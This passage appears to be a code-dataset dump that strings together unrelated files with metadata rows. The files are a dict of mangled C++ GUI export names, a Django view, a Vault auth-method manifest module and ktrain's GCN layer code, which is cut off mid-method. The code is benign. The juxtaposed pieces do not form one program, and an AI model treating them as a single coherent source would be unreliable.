2131: b'??0OKButton@@QAE@PAVWindow@@ABVResId@@@Z',
2132: b'??0OKButton@@QAE@PAVWindow@@G@Z',
2133: b'??0PushButton@@QAE@FPAVWindow@@G@Z',
2134: b'??0PushButton@@QAE@PAVWindow@@ABVResId@@@Z',
2135: b'??0PushButton@@QAE@PAVWindow@@G@Z',
2136: b'??0RadioButton@@QAE@PAVWindow@@ABVResId@@@Z',
2137: b'??0RadioButton@@QAE@PAVWindow@@G@Z',
2138: b'??0TriStateBox@@QAE@PAVWindow@@ABVResId@@@Z',
2139: b'??0TriStateBox@@QAE@PAVWindow@@G@Z',
2140: b'??1Button@@UAE@XZ',
2141: b'??1CancelButton@@UAE@XZ',
2142: b'??1CheckBox@@UAE@XZ',
2143: b'??1HelpButton@@UAE@XZ',
2144: b'??1OKButton@@UAE@XZ',
2145: b'??1RadioButton@@UAE@XZ',
2146: b'??1TriStateBox@@UAE@XZ',
2147: b'??7Link@@QBEEXZ',
2148: b'??_7Button@@6B@',
2149: b'??_7CancelButton@@6B@',
2150: b'??_7CheckBox@@6B@',
2151: b'??_7HelpButton@@6B@',
2152: b'??_7OKButton@@6B@',
2153: b'??_7PushButton@@6B@',
2154: b'??_7RadioButton@@6B@',
2155: b'??_7TriStateBox@@6B@',
2156: b'??_GButton@@UAEPAXI@Z',
2157: b'??_GCancelButton@@UAEPAXI@Z',
2158: b'??_GCheckBox@@UAEPAXI@Z',
2159: b'??_GHelpButton@@UAEPAXI@Z',
2160: b'??_GOKButton@@UAEPAXI@Z',
2161: b'??_GPushButton@@UAEPAXI@Z',
2162: b'??_GRadioButton@@UAEPAXI@Z',
2163: b'??_GTriStateBox@@UAEPAXI@Z',
2164: b'?ChangeState@TriStateBox@@QAE?AW4TriState@@W42@@Z',
2165: b'?Check@CheckBox@@QAEXE@Z',
2166: b'?Check@RadioButton@@QAEXE@Z',
2167: b'?Click@Button@@UAEXXZ',
2168: b'?Click@CancelButton@@UAEXXZ',
2169: b'?Click@HelpButton@@UAEXXZ',
2170: b'?Click@OKButton@@UAEXXZ',
2171: b'?EnableTriState@TriStateBox@@QAEXE@Z',
2172: b'?GetState@TriStateBox@@QBE?AW4TriState@@XZ',
2173: b'?InitCheckBox@@YGXPAVCheckBox@@@Z',
2174: b'?InitRadioButton@@YGXPAVRadioButton@@@Z',
2175: b'?IsChecked@CheckBox@@QBEEXZ',
2176: b'?IsChecked@RadioButton@@QBEEXZ',
2177: b'?IsTriStateEnabled@TriStateBox@@QBEEXZ',
2178: b'??0MenuButton@@QAE@FPAVWindow@@G@Z',
2179: b'??0MenuButton@@QAE@PAVWindow@@ABVResId@@@Z',
2180: b'??0MenuButton@@QAE@PAVWindow@@G@Z',
2181: b'??1MenuButton@@UAE@XZ',
2182: b'??_7MenuButton@@6B@',
2183: b'??_GMenuButton@@UAEPAXI@Z',
2184: b'?ChangePopupMenu@MenuButton@@QAEPAVPopupMenu@@PAV2@@Z',
2185: b'?Select@MenuButton@@UAEXXZ',
2186: b'??0BitmapButton@@QAE@PAVWindow@@ABVResId@@@Z',
2187: b'??0BitmapButton@@QAE@PAVWindow@@G@Z',
2188: b'??0SymbolButton@@QAE@PAVWindow@@ABVResId@@@Z',
2189: b'??0SymbolButton@@QAE@PAVWindow@@G@Z',
2190: b'??1BitmapButton@@UAE@XZ',
2191: b'??1SymbolButton@@UAE@XZ',
2192: b'??_7BitmapButton@@6B@',
2193: b'??_7SymbolButton@@6B@',
2194: b'??_GBitmapButton@@UAEPAXI@Z',
2195: b'??_GSymbolButton@@UAEPAXI@Z',
2196: b'?ChangeBitmap@BitmapButton@@QAE?AVBitmap@@ABV2@@Z',
2197: b'?ChangeSymbol@SymbolButton@@QAE?AW4SymbolType@@W42@@Z',
2198: b'?InitBitmapButton@@YGXPAVBitmapButton@@@Z',
2199: b'??0Edit@@QAE@FPAVWindow@@G@Z',
2200: b'??0Edit@@QAE@PAVWindow@@ABVResId@@@Z',
2201: b'??0Edit@@QAE@PAVWindow@@G@Z',
2202: b'??0MultiLineEdit@@QAE@PAVWindow@@ABVResId@@@Z',
2203: b'??0MultiLineEdit@@QAE@PAVWindow@@G@Z',
2204: b'??1Edit@@UAE@XZ',
2205: b'??1MultiLineEdit@@UAE@XZ',
2206: b'??_7Edit@@6B@',
2207: b'??_7MultiLineEdit@@6B@',
2208: b'??_GEdit@@UAEPAXI@Z',
2209: b'??_GMultiLineEdit@@UAEPAXI@Z',
2210: b'?ChangeMaxTextLen@Edit@@QAEGG@Z',
2211: b'?ChangeSelection@Edit@@QAE?AVSelection@@ABV2@@Z',
2212: b'?ClearModifyFlag@Edit@@QAEXXZ',
2213: b'?Copy@Edit@@QAEXXZ',
2214: b'?Cut@Edit@@QAEXXZ',
2215: b'?DeleteSelected@Edit@@QAEXXZ',
2216: b'?GetMaxTextLen@Edit@@QBEGXZ',
2217: b'?GetSelected@Edit@@QBE?AVString@@XZ',
2218: b'?GetSelection@Edit@@QBE?AVSelection@@XZ',
2219: b'?IsModified@Edit@@QBEEXZ',
2220: b'?Max@Selection@@QAEAAFXZ',
2221: b'?Max@Selection@@QBEFXZ',
2222: b'?Modify@Edit@@UAEXXZ',
2223: b'?Paste@Edit@@QAEXXZ',
2224: b'?ReplaceSelected@Edit@@QAEXABVString@@@Z',
2225: b'?SetEditSelection@@YGXPAUHWND__@@KK@Z',
2226: b'??0ComboBox@@QAE@FPAVWindow@@G@Z',
2227: b'??0ComboBox@@QAE@PAVWindow@@ABVResId@@@Z',
2228: b'??0ComboBox@@QAE@PAVWindow@@G@Z',
2229: b'??1ComboBox@@UAE@XZ',
2230: b'??_7ComboBox@@6B@',
2231: b'??_GComboBox@@UAEPAXI@Z',
2232: b'?Clear@ComboBox@@QAEXXZ',
2233: b'?DoubleClick@ComboBox@@UAEXXZ',
2234: b'?GetEntry@ComboBox@@QBE?AVString@@G@Z',
2235: b'?GetEntryCount@ComboBox@@QBEGXZ',
2236: b'?GetEntryPos@ComboBox@@QBEGABVString@@@Z',
2237: b'?InitCombo@@YGXPAVComboBox@@G@Z',
2238: b'?InsertEntry@ComboBox@@QAEEABVString@@G@Z',
2239: b'?IsTravelSelect@ComboBox@@QBEEXZ',
2240: b'?RemoveEntry@ComboBox@@QAEXABVString@@@Z',
2241: b'?RemoveEntry@ComboBox@@QAEXG@Z',
2242: b'?Select@ComboBox@@UAEXXZ',
2243: b'??0ListBox@@QAE@FPAVWindow@@G@Z',
2244: b'??0ListBox@@QAE@PAVWindow@@ABVResId@@@Z',
2245: b'??0ListBox@@QAE@PAVWindow@@G@Z',
2246: b'??0MultiListBox@@QAE@PAVWindow@@ABVResId@@@Z',
2247: b'??0MultiListBox@@QAE@PAVWindow@@G@Z',
2248: b'??1ListBox@@UAE@XZ',
2249: b'??1MultiListBox@@UAE@XZ',
2250: b'??_7ListBox@@6B@',
2251: b'??_7MultiListBox@@6B@',
2252: b'??_GListBox@@UAEPAXI@Z',
2253: b'??_GMultiListBox@@UAEPAXI@Z',
2254: b'?Clear@ListBox@@QAEXXZ',
2255: b'?DoubleClick@ListBox@@UAEXXZ',
2256: b'?GetEntry@ListBox@@QBE?AVString@@G@Z',
2257: b'?GetEntryCount@ListBox@@QBEGXZ',
2258: b'?GetEntryPos@ListBox@@QBEGABVString@@@Z',
2259: b'?GetSelectEntry@ListBox@@QBE?AVString@@G@Z',
2260: b'?GetSelectEntryCount@ListBox@@QBEGXZ',
2261: b'?GetSelectEntryPos@ListBox@@QBEGG@Z',
2262: b'?InsertEntry@ListBox@@QAEEABVBitmap@@G@Z',
2263: b'?InsertEntry@ListBox@@QAEEABVString@@ABVBitmap@@G@Z',
2264: b'?InsertEntry@ListBox@@QAEEABVString@@G@Z',
2265: b'?IsEntryPosSelected@ListBox@@QBEEG@Z',
2266: b'?IsEntrySelected@ListBox@@QBEEABVString@@@Z',
2267: b'?IsTravelSelect@ListBox@@QBEEXZ',
2268: b'?RemoveEntry@ListBox@@QAEXABVString@@@Z',
2269: b'?RemoveEntry@ListBox@@QAEXG@Z',
2270: b'?Select@ListBox@@UAEXXZ',
2271: b'?SelectEntry@ListBox@@QAEXABVString@@E@Z',
2272: b'?SelectEntryPos@ListBox@@QAEXGE@Z',
2273: b'?SetNoSelection@ListBox@@QAEXXZ',
2274: b'??0FixedBitmap@@QAE@PAVWindow@@ABVResId@@@Z',
2275: b'??0FixedBitmap@@QAE@PAVWindow@@G@Z',
2276: b'??0FixedIcon@@QAE@PAVWindow@@ABVResId@@@Z',
2277: b'??0FixedIcon@@QAE@PAVWindow@@G@Z',
2278: b'??0FixedText@@QAE@PAVWindow@@ABVResId@@@Z',
2279: b'??0FixedText@@QAE@PAVWindow@@G@Z',
2280: b'??1FixedBitmap@@UAE@XZ',
2281: b'??1FixedIcon@@UAE@XZ',
2282: b'??1FixedText@@UAE@XZ',
2283: b'??_7FixedBitmap@@6B@',
2284: b'??_7FixedIcon@@6B@',
2285: b'??_7FixedText@@6B@',
2286: b'??_GFixedBitmap@@UAEPAXI@Z',
2287: b'??_GFixedIcon@@UAEPAXI@Z',
2288: b'??_GFixedText@@UAEPAXI@Z',
2289: b'?ChangeBitmap@FixedBitmap@@QAE?AVBitmap@@ABV2@@Z',
2290: b'?ChangeIcon@FixedIcon@@QAE?AVIcon@@ABV2@@Z',
2291: b'?Paint@FixedBitmap@@UAEXABVRectangle@@@Z',
2292: b'?Paint@FixedIcon@@UAEXABVRectangle@@@Z',
2293: b'?Resize@FixedBitmap@@UAEXXZ',
2294: b'?Resize@FixedIcon@@UAEXXZ',
2295: b'??0GroupBox@@QAE@PAVWindow@@@Z',
2296: b'??0GroupBox@@QAE@PAVWindow@@ABVResId@@@Z',
2297: b'??1GroupBox@@UAE@XZ',
2298: b'??_7GroupBox@@6B@',
2299: b'??_GGroupBox@@UAEPAXI@Z',
2300: b'??0Range@@QAE@ABV0@@Z',
2301: b'??0Range@@QAE@FF@Z',
2302: b'??0Range@@QAE@XZ',
2303: b'??0ScrollBar@@QAE@PAVWindow@@ABVResId@@@Z',
2304: b'??0ScrollBar@@QAE@PAVWindow@@G@Z',
2305: b'??1ScrollBar@@UAE@XZ',
2306: b'??4Range@@QAEAAV0@ABV0@@Z',
2307: b'??_7ScrollBar@@6B@',
2308: b'??_GScrollBar@@UAEPAXI@Z',
2309: b'?ChangeLineSize@ScrollBar@@QAEFF@Z',
2310: b'?ChangePageSize@ScrollBar@@QAEFF@Z',
2311: b'?ChangeRange@ScrollBar@@QAE?AVRange@@ABV2@@Z',
2312: b'?ChangeThumbPos@ScrollBar@@QAEFF@Z',
2313: b'?ChangeVisibleSize@ScrollBar@@QAEGG@Z',
2314: b'?EndScroll@ScrollBar@@UAEXXZ',
2315: b'?GetDelta@ScrollBar@@QBEFXZ',
2316: b'?GetLineSize@ScrollBar@@QBEFXZ',
2317: b'?GetPageSize@ScrollBar@@QBEFXZ',
2318: b'?GetRange@ScrollBar@@QBE?AVRange@@XZ',
2319: b'?GetThumbPos@ScrollBar@@QBEFXZ',
2320: b'?GetType@ScrollBar@@QBE?AW4ScrollType@@XZ',
2321: b'?GetVisibleSize@ScrollBar@@QBEGXZ',
2322: b'?Scroll@ScrollBar@@UAEXXZ',
2323: b'??0Clipboard@@QAE@XZ',
2324: b'??0Exchange@@QAE@XZ',
2325: b'??0ExchangeFormat@@QAE@ABVString@@KI0@Z',
2326: b'??1Clipboard@@QAE@XZ',
2327: b'??1Exchange@@QAE@XZ',
2328: b'??1ExchangeFormat@@QAE@XZ',
2329: b'??_7Clipboard@@6B@',
2330: b'??_7Exchange@@6B@',
2331: b'??_GExchangeFormat@@QAEPAXI@Z',
2332: b'?Clear@Clipboard@@SGXXZ',
2333: b'?Cleared@Clipboard@@UAEXXZ',
2334: b'?CopyBitmap@Clipboard@@SGEABVBitmap@@@Z',
2335: b'?CopyData@Clipboard@@SGEPBXKKG@Z',
2336: b'?CopyGDIMetaFile@Clipboard@@SGEABVGDIMetaFile@@@Z',
2337: b'?CopyPrivateData@Clipboard@@SGEPAX@Z',
2338: b'?CopyRequest@Clipboard@@SGEK@Z',
2339: b'?CopyString@Clipboard@@SGEABVString@@@Z',
2340: b'?GetDataLen@Clipboard@@SGKK@Z',
2341: b'?GetFormat@Clipboard@@SGKG@Z',
2342: b'?GetFormatCount@Clipboard@@SGGXZ',
2343: b'?GetFormatName@Exchange@@SG?AVString@@K@Z',
2344: b'?GetRequestFormat@Clipboard@@SGKXZ',
2345: b'?HasFormat@Clipboard@@SGEK@Z',
2346: b'?PasteBitmap@Clipboard@@SG?AVBitmap@@XZ',
2347: b'?PasteData@Clipboard@@SGEPAXKK@Z',
2348: b'?PasteGDIMetaFile@Clipboard@@SGEAAVGDIMetaFile@@@Z',
2349: b'?PastePrivateData@Clipboard@@SGPAXXZ',
2350: b'?PasteString@Clipboard@@SG?AVString@@XZ',
2351: b'?RegisterFormatName@Exchange@@SGKABVString@@@Z',
2352: b'?Request@Exchange@@UAEXXZ',
2353: b'??0DataObject@@QAE@EE@Z',
2354: b'??0DropSource@@QAE@XZ',
2355: b'??0DropTarget@@QAE@PAVWindow@@@Z',
2356: b'??0StarObjectMgr@@QAE@XZ',
2357: b'??0TransferFormatList@@QAE@GG@Z',
2358: b'??1DataObject@@QAE@XZ',
2359: b'??1DropSource@@QAE@XZ',
2360: b'??1DropTarget@@UAE@XZ',
2361: b'??1StarObjectMgr@@QAE@XZ',
2362: b'??8TransferFormat@@QBEEABV0@@Z',
2363: b'??_7DataObject@@6B@',
2364: b'??_7DropSource@@6B@',
2365: b'??_7DropTarget@@6B@',
2366: b'??_GDropTarget@@UAEPAXI@Z',
2367: b'?AppendFormat@DataObject@@QAEXABVTransferFormat@@@Z',
2368: b'?Clear@DataObject@@UAEXXZ',
2369: b'?ClearFormatList@DataObject@@AAEXXZ',
2370: b'?Count@TransferFormatList@@QBEKXZ',
2371: b'?CreateData@DataObject@@UAEPAVTransferData@@ABVTransferFormat@@@Z',
2372: b'?DragEnter@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2373: b'?DragLeave@DropTarget@@UAEXXZ',
2374: b'?DragOver@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2375: b'?Drop@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2376: b'?Execute@DropSource@@QAE?AW4DropAction@@EEE@Z',
2377: b'?FormatCount@DataObject@@QBEKXZ',
2378: b'?GetFormat@DataObject@@QBEPBVTransferFormat@@K@Z',
2379: b'?GetObject@TransferFormatList@@QBEPAVTransferFormat@@K@Z',
2380: b'?GiveFeedback@DropSource@@UAEEW4DropAction@@@Z',
2381: b'?HasFormat@DataObject@@QBEEABVTransferFormat@@@Z',
2382: b'?Insert@TransferFormatList@@QAEXPAVTransferFormat@@K@Z',
2383: b'?IsFormatList@DataObject@@QBEEXZ',
2384: b'?OnNewData@DataObject@@UAEXXZ',
2385: b'?RegisterWindow@DropTarget@@QAEXPAVWindow@@@Z',
2386: b'?GetSVGDIMetaFile@@YG?AVGDIMetaFile@@PAXE@Z',
2387: b'??0DragServer@@QAE@XZ',
2388: b'??0MySource@@QAE@PAVWindow@@ABVPointer@@11@Z',
2389: b'??0TransferData@@QAE@ABVTransferFormat@@@Z',
2390: b'??0WinTransferData@@QAE@ABVTransferFormat@@PAX@Z',
2391: b'??1DragServer@@QAE@XZ',
2392: b'??1MySource@@QAE@XZ',
2393: b'??1TransferData@@UAE@XZ',
2394: b'??1WinTransferData@@UAE@XZ',
2395: b'??_7DragServer@@6B@',
2396: b'??_7MySource@@6B@',
2397: b'??_7TransferData@@6B@',
2398: b'??_7WinTransferData@@6B@',
2399: b'??_GBitmap@@QAEPAXI@Z',
2400: b'??_GTransferData@@UAEPAXI@Z',
2401: b'??_GWinTransferData@@UAEPAXI@Z',
2402: b'?Clear@DragServer@@SGXXZ',
2403: b'?CopyBitmap@DragServer@@SGEABVBitmap@@@Z',
2404: b'?CopyData@DragServer@@SGEPBXKKG@Z',
2405: b'?CopyFileA@DragServer@@SGEABVString@@@Z',
2406: b'?CopyGDIMetaFile@DragServer@@SGEABVGDIMetaFile@@@Z',
2407: b'?CopyPrivateData@DragServer@@SGEPAX@Z',
2408: b'?CopyRequest@DragServer@@SGEK@Z',
2409: b'?CopyString@DragServer@@SGEABVString@@@Z',
2410: b'?CreateData@MySource@@UAEPAVTransferData@@ABVTransferFormat@@@Z',
2411: b'?ExecuteDrag@Window@@QAE?AW4DropAction@@ABVPointer@@0GPBVRegion@@@Z',
2412: b'?Get@WinTransferData@@UBEQAXXZ',
2413: b'?GetDataLen@DragServer@@SGKGK@Z',
2414: b'?GetFormat@DragServer@@SGKGG@Z',
2415: b'?GetFormatCount@DragServer@@SGGG@Z',
2416: b'?GetItemCount@DragServer@@SGGXZ',
2417: b'?GetOwnership@WinTransferData@@UAEPAXXZ',
2418: b'?GetRequestFormat@DragServer@@SGKXZ',
2419: b'?GetRequestItem@DragServer@@SGGXZ',
2420: b'?GetTargetPrinterName@DragServer@@SG?AVString@@XZ',
2421: b'?GiveFeedback@MySource@@UAEEW4DropAction@@@Z',
2422: b'?HasFormat@DragServer@@SGEGK@Z',
2423: b'?IsRequestName@DragServer@@SGEXZ',
2424: b'?Last@List@@QAEPAXXZ',
2425: b'?NewItem@DragServer@@SGXXZ',
2426: b'?PasteBitmap@DragServer@@SG?AVBitmap@@G@Z',
2427: b'?PasteData@DragServer@@SGEGPAXKK@Z',
2428: b'?PasteFile@DragServer@@SG?AVString@@G@Z',
2429: b'?PasteGDIMetaFile@DragServer@@SGEGAAVGDIMetaFile@@@Z',
2430: b'?PastePrivateData@DragServer@@SGPAXG@Z',
2431: b'?PasteString@DragServer@@SG?AVString@@G@Z',
2432: b'?SetPointers@MySource@@QAEXPAVWindow@@ABVPointer@@11@Z',
}
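# Note: the integer -> bytes entries above appear to be MSVC-decorated (mangled)
# C++ export names keyed by ordinal; for example b'?Show@Window@@QAEXXZ'
# demangles to Window::Show(void) (demangled reading given here for illustration).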
| 45.995866
| 83
| 0.651442
|
563582b15d77da5eb881db3a8f1e008b1e1bff8f
| 120
|
py
|
Python
|
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def homep(request):
    return render(request, 'homep.html')
| 24
| 37
| 0.775
|
57edcceceada6f3fd64ff2a1d6a153815c8ff332
| 1,461
|
py
|
Python
|
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | null | null | null |
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | 4
|
2019-10-03T22:36:56.000Z
|
2019-10-09T16:12:26.000Z
|
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Optional
import hvac
from vaultup.manifests import ManifestItem
class LdapAuthConfigManifest(ManifestItem):
    def __init__(self, client: hvac.Client, name: str, data: Dict):
        super().__init__(data)
    def convert(self) -> Optional[Dict]:
        return self.data
AUTH_TYPES = {
    "ldap": LdapAuthConfigManifest
}
class AuthMethodManifest(ManifestItem):
    """
    Manifest entry for an auth method.
    """
    def __init__(self, client: hvac.Client, name: str, data: Dict):
        super().__init__(data)
        auth_type = data["type"]
        if auth_type in client.auth.implemented_class_names and auth_type in AUTH_TYPES:
            auth_conf = client.auth.__getattr__(auth_type).read_configuration(mount_point=name)["data"]
            self._auth_config = AUTH_TYPES[auth_type](client, name, auth_conf).convert()
        else:
            self._auth_config = None
    def convert(self) -> Optional[Dict]:
        config = self.data.get("config", {})
        # add type-specific entries to config
        if self._auth_config:
            config[self.data["type"]] = self._auth_config
        return {
            "type": self.data["type"],
            "description": self.data.get("description"),
            "config": self.data.get("config"),
            "local": self.data.get("local"),
            "options": self.data.get("options"),
            "seal_wrap": self.data.get("seal_wrap"),
        }
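# Usage sketch (illustrative only; the mount name and entry dict below are
# hypothetical, and `client` is assumed to be an authenticated hvac.Client):
#   entry = {"type": "ldap", "description": "corp LDAP", "config": {}}
#   manifest = AuthMethodManifest(client, "ldap", entry).convert()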
| 28.647059
| 103
| 0.62423
|
1293e34cc58e9a42ae65bd5a9cb06b6214ddb407
| 15,963
|
py
|
Python
|
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ....imports import *
from ..mapper import FullBatchNodeGenerator
from .misc import SqueezedSparseConversion
class GraphConvolution(Layer):
"""
Graph Convolution (GCN) Keras layer.
The implementation is based on the keras-gcn github repo https://github.com/tkipf/keras-gcn.
Original paper: Semi-Supervised Classification with Graph Convolutional Networks. Thomas N. Kipf, Max Welling,
International Conference on Learning Representations (ICLR), 2017 https://github.com/tkipf/gcn
Notes:
- The inputs are tensors with a batch dimension of 1:
Keras requires this batch dimension, and for full-batch methods
we only have a single "batch".
- There are three inputs required, the node features, the output
indices (the nodes that are to be selected in the final layer)
and the normalized graph Laplacian matrix
- This class assumes that the normalized Laplacian matrix is passed as
input to the Keras methods.
- The output indices are used when ``final_layer=True`` and the returned outputs
are the final-layer features for the nodes indexed by output indices.
- If ``final_layer=False`` all the node features are output in the same ordering as
given by the adjacency matrix.
Args:
units (int): dimensionality of output feature vectors
activation (str): nonlinear activation applied to layer's output to obtain output features
use_bias (bool): toggles an optional bias
final_layer (bool): If False the layer returns output for all nodes,
if True it returns the subset specified by the indices passed to it.
        kernel_initializer (str): name of the initializer for kernel parameters (weights)
        bias_initializer (str): name of the initializer for bias
kernel_regularizer (str): name of regularizer to be applied to layer kernel. Must be a Keras regularizer.
bias_regularizer (str): name of regularizer to be applied to layer bias. Must be a Keras regularizer.
activity_regularizer (str): not used in the current implementation
kernel_constraint (str): constraint applied to layer's kernel
bias_constraint (str): constraint applied to layer's bias
"""
def __init__(
self,
units,
activation=None,
use_bias=True,
final_layer=False,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs,
):
if "input_shape" not in kwargs and "input_dim" in kwargs:
kwargs["input_shape"] = (kwargs.get("input_dim"),)
super().__init__(**kwargs)
self.units = units
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.final_layer = final_layer
def get_config(self):
"""
Gets class configuration for Keras serialization.
Used by keras model serialization.
Returns:
A dictionary that contains the config of the layer
"""
config = {
"units": self.units,
"use_bias": self.use_bias,
"final_layer": self.final_layer,
"activation": activations.serialize(self.activation),
"kernel_initializer": initializers.serialize(self.kernel_initializer),
"bias_initializer": initializers.serialize(self.bias_initializer),
"kernel_regularizer": regularizers.serialize(self.kernel_regularizer),
"bias_regularizer": regularizers.serialize(self.bias_regularizer),
"activity_regularizer": regularizers.serialize(self.activity_regularizer),
"kernel_constraint": constraints.serialize(self.kernel_constraint),
"bias_constraint": constraints.serialize(self.bias_constraint),
}
base_config = super().get_config()
return {**base_config, **config}
def compute_output_shape(self, input_shapes):
"""
Computes the output shape of the layer.
Assumes the following inputs:
Args:
input_shape (tuple of ints)
Shape tuples can include None for free dimensions, instead of an integer.
Returns:
            An output shape tuple.
"""
feature_shape, out_shape, *As_shapes = input_shapes
batch_dim = feature_shape[0]
if self.final_layer:
out_dim = out_shape[1]
else:
out_dim = feature_shape[1]
return (batch_dim, out_dim, self.units)
def build(self, input_shapes):
"""
Builds the layer
Args:
input_shape (list of int): shapes of the layer's inputs (node features and adjacency matrix)
"""
feat_shape = input_shapes[0]
input_dim = feat_shape[-1]
self.kernel = self.add_weight(
shape=(input_dim, self.units),
initializer=self.kernel_initializer,
name="kernel",
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
)
if self.use_bias:
self.bias = self.add_weight(
shape=(self.units,),
initializer=self.bias_initializer,
name="bias",
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
)
else:
self.bias = None
self.built = True
def call(self, inputs):
"""
Applies the layer.
Args:
inputs (list): a list of 3 input tensors that includes
node features (size 1 x N x F),
output indices (size 1 x M)
graph adjacency matrix (size N x N),
where N is the number of nodes in the graph, and
F is the dimensionality of node features.
Returns:
Keras Tensor that represents the output of the layer.
"""
features, out_indices, *As = inputs
batch_dim, n_nodes, _ = K.int_shape(features)
if batch_dim != 1:
raise ValueError(
"Currently full-batch methods only support a batch dimension of one"
)
# Remove singleton batch dimension
features = K.squeeze(features, 0)
out_indices = K.squeeze(out_indices, 0)
# Calculate the layer operation of GCN
A = As[0]
h_graph = K.dot(A, features)
output = K.dot(h_graph, self.kernel)
# Add optional bias & apply activation
        if self.bias is not None:
output += self.bias
output = self.activation(output)
# On the final layer we gather the nodes referenced by the indices
if self.final_layer:
output = K.gather(output, out_indices)
# Add batch dimension back if we removed it
# print("BATCH DIM:", batch_dim)
if batch_dim == 1:
output = K.expand_dims(output, 0)
return output
class GCN:
"""
A stack of Graph Convolutional layers that implement a graph convolution network model
as in https://arxiv.org/abs/1609.02907
The model minimally requires specification of the layer sizes as a list of ints
corresponding to the feature dimensions for each hidden layer,
activation functions for each hidden layers, and a generator object.
To use this class as a Keras model, the features and pre-processed adjacency matrix
should be supplied using the :class:`FullBatchNodeGenerator` class. To have the appropriate
pre-processing the generator object should be instantiated as follows::
generator = FullBatchNodeGenerator(G, method="gcn")
Note that currently the GCN class is compatible with both sparse and dense adjacency
matrices and the :class:`FullBatchNodeGenerator` will default to sparse.
For more details, please see the GCN demo notebook:
demos/node-classification/gat/gcn-cora-node-classification-example.ipynb
Notes:
- The inputs are tensors with a batch dimension of 1. These are provided by the \
:class:`FullBatchNodeGenerator` object.
      - This assumes that the normalized Laplacian matrix is provided as input to
Keras methods. When using the :class:`FullBatchNodeGenerator` specify the
``method='gcn'`` argument to do this pre-processing.
- The nodes provided to the :class:`FullBatchNodeGenerator.flow` method are
used by the final layer to select the predictions for those nodes in order.
However, the intermediate layers before the final layer order the nodes
in the same way as the adjacency matrix.
Examples:
Creating a GCN node classification model from an existing :class:`StellarGraph`
object ``G``::
generator = FullBatchNodeGenerator(G, method="gcn")
gcn = GCN(
layer_sizes=[32, 4],
activations=["elu","softmax"],
generator=generator,
dropout=0.5
)
x_inp, predictions = gcn.node_model()
Args:
layer_sizes (list of int): list of output sizes of GCN layers in the stack
activations (list of str): list of activations applied to each layer's output
generator (FullBatchNodeGenerator): an instance of FullBatchNodeGenerator class constructed on the graph of interest
bias (bool): toggles an optional bias in GCN layers
dropout (float): dropout rate applied to input features of each GCN layer
kernel_regularizer (str): normalization applied to the kernels of GCN layers
"""
def __init__(
self,
layer_sizes,
activations,
generator,
bias=True,
dropout=0.0,
kernel_regularizer=None,
):
if not isinstance(generator, FullBatchNodeGenerator):
            raise TypeError("Generator should be an instance of FullBatchNodeGenerator")
assert len(layer_sizes) == len(activations)
self.layer_sizes = layer_sizes
self.activations = activations
self.bias = bias
self.dropout = dropout
self.kernel_regularizer = kernel_regularizer
self.generator = generator
self.support = 1
self.method = generator.method
# Check if the generator is producing a sparse matrix
self.use_sparse = generator.use_sparse
# Initialize a stack of GCN layers
n_layers = len(self.layer_sizes)
self._layers = []
for ii in range(n_layers):
l = self.layer_sizes[ii]
a = self.activations[ii]
self._layers.append(Dropout(self.dropout))
self._layers.append(
GraphConvolution(
l,
activation=a,
use_bias=self.bias,
kernel_regularizer=self.kernel_regularizer,
final_layer=ii == (n_layers - 1),
)
)
def __call__(self, x):
"""
Apply a stack of GCN layers to the inputs.
The input tensors are expected to be a list of the following:
[
Node features shape (1, N, F),
Adjacency indices (1, E, 2),
Adjacency values (1, E),
Output indices (1, O)
]
where N is the number of nodes, F the number of input features,
E is the number of edges, O the number of output nodes.
Args:
x (Tensor): input tensors
Returns:
Output tensor
"""
x_in, out_indices, *As = x
# Currently we require the batch dimension to be one for full-batch methods
batch_dim, n_nodes, _ = K.int_shape(x_in)
if batch_dim != 1:
raise ValueError(
"Currently full-batch methods only support a batch dimension of one"
)
# Convert input indices & values to a sparse matrix
